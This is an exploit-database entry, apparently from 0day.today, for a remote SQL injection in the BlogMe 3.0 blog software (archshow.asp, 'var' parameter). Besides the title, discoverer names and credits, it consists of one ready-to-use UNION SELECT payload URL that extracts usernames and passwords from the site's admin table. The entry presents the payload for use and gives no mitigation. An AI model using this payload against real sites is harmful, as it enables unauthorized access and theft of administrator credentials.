id: 1868
date: 05/12/2007
title: BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability
author: gsy
cves: 

================================================================
BlogMe 3.0 (archshow.asp var) Remote SQL Injection Vulnerability
================================================================



Discoveredby:gsy&kerem125


ScriptDownload:http://www.drumster.net/gamma/products.asp (must buy)


exploit:/blogme/archshow.asp?var=-99%20Union+all+select+0,1,2,3,4,username,password,7,8,9,10,0+from+admin


Specialthxto:by_emr3,ercu_145,bolivar,voltigore,f10



#  0day.today [2023-03-22]  #